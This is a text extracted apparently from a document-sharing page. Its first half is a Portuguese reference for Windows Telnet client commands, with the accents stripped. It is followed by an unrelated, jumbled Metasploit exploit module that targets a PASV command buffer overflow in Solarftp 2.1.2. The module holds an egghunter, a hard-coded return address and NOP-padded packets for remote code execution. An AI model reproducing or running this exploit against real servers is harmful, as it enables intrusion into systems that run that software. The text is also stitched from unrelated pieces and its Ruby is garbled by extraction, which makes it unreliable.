Você está na página 1de 5

Comandos Telnet

Comandos Telnet
Os comandos Telnet permitem a comunicao com um computador remoto que esteja usando o protocolo Telnet. possvel executar o Telnet sem parmetros para inserir o contexto do Telnet, indicado pelo prompt do Telnet (Microsoft Telnet>). No prompt Telnet, use os comandos Telnet para gerenciar um computador que esteja executando o cliente Telnet. O prompt de comando do cliente Telnet aceita os seguintes comandos:

Comando Descrio open close display send Use opennome_do_ host para estabelecer uma conexo Telnet com um host. Use o comando close para fechar uma conexo Telnet existente. Use o comando display para exibir as configuraes atuais do cliente Telnet. Use o comando send para enviar comandos ao servidor Telnet. H suporte para os seguintes comandos: ao Comando Abort output. ayt Comando "Are you there?". esc Envia o caractere de escape atual. ip Comando Interrupt process. synch Executa a operao de sincronizao do Telnet. brk Envia um sinal de interrupo. Quaisquer outros comandos diferentes desses listados anteriormente sero enviados como uma se qncia para o servidor Telnet. Por exemplo, sendabcd enviar a seqncia abcd para o servidor Telnet, que emitir um eco da seqncia na janela da sesso Telnet. Use o comando quit para fechar o cliente Telnet. Use o comando set com um dos seguintes argumentos para configurar o cliente Telnet para a sesso atual. bsasdel A tecla Backspace funcionar como Delete. codeset opo Disponvel apenas quando o idioma definido como japons. Defina o conjunto de cdigos atual como opo, que pode ser:

quit set

Shift JIS EUC japons JIS Kanji JIS Kanji (78) DEC Kanji NEC Kanji

O mesmo conjunto de cdigos deve ser definido no computador remoto. Por padro, o cliente Telnet usa uma fonte de varredura. Antes de acessar um computador remoto usando um desses conjuntos de cdigos, voc deve configurar o cliente Telnet para usar uma fonte TrueType para garantir que os caracteres sero exibidos adequadamente. crlf Novo modo de linha; faz com que a tecla RETURN envie 0x0D, 0x0A. delasbs

A tecla Delete funcionar como Backspace. escapecaractere Alterna do modo da sesso Telnet para o modo de comando Telnet. Estando no modo de comando Telnet, pressione ENTER para voltar para o modo de sesso Telnet. localecho Desativa o eco local. logfilenome Especifica o nome do arquivo para o qual o log do Telnet gravado para essa sesso. Se voc no especificar o caminho do arquivo, ele ser criado no diretrio atual. Especificar um arquivo de log tambm ativa o registro em log. logging Ativa o registro em log para essa sesso. mode {console | stream} O modo de operao. ntlm Ativa a autenticao NTLM. term {ansi | vt100 | vt52 | vtnt} O tipo de terminal que voc deseja que o cliente Telnet emule. ? Exibe informaes de ajuda para set. unset status ?/help Use unset para desabilitar uma opo anteriormente definida usando o comando set. Use o comando status para determinar se o computador que est executando o cliente Telnet est conectado. Exibe informaes de ajuda.

Para obter informaes sobre os comandos do servidor Telnet, consulte Referncia de linha de comando para servidor Telnet. Marcas : gostoso (x) Adicionar uma marca

# Exploit Title: Solarftp v2.1.2 PASV buffer overflow # Date: Aug 17, 2011

# # # # #

Author: qnix Software Link: http://solarftp.com/files/solarftps-setup.exe Version: 2.1.2 Tested on: Windows XP Universal Detailed info: http://0x80.org/blog/?p=545

require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::Egghunter def initialize(info = {}) super(update_info(info, 'Name' => 'Solarftp 2.1.2 PASV Command Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the PASV command in Solarftp 2.1.2 You must have valid credentials to trigger this vulnerability. Also, you ony get one chance. }, 'Author' => 'qnix', 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://0x80.org/blog/?p=545'], ], 'DefaultOptions' => { 'WfsDelay' => 45, 'EXITFUNC' => 'thread', }, 'Payload' { =>

'Space' => 1000, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' }, 'Platform' 'Targets' [ FFE0 JMP EAX => 'win', => #1001BD23 @sfsweb.dll [ 'Windows XP Universal', 0x1001BD23, 'Offset' => 195} ], ], 'DisclosureDate' => 'Aug 17 2011', 'DefaultTarget' => 0)) { 'Ret' => . => -3500,

end

def exploit connect_login print_status("Trying target #{target.name}") print_status("Creating Egg Hunter") eggoptions = { :checksum => true, :eggtag => "W00T" } hunter,egg = generate_egghunter(payload.encoded,payload_badchars,eggoptions) fix = "\x11" # To fix some left overs from uncontrolled

buffer

# to avoid access violation. pk1 = make_nops(75) pk1 << fix pk1 << make_nops(20) pk1 << hunter pk1 << make_nops((100-fix.length-hunter.length)) pk1 << [target.ret].pack('V') pk1 << egg pk1 << make_nops(6631-[target.ret].length-target['Offset']egg.length) print_status("Sending first packet...") send_cmd( ["PASV",pk1], false) pk2 = make_nops(3000) print_status("Sending second packet...") send_cmd( ["PASV",pk2], false) handler disconnect end end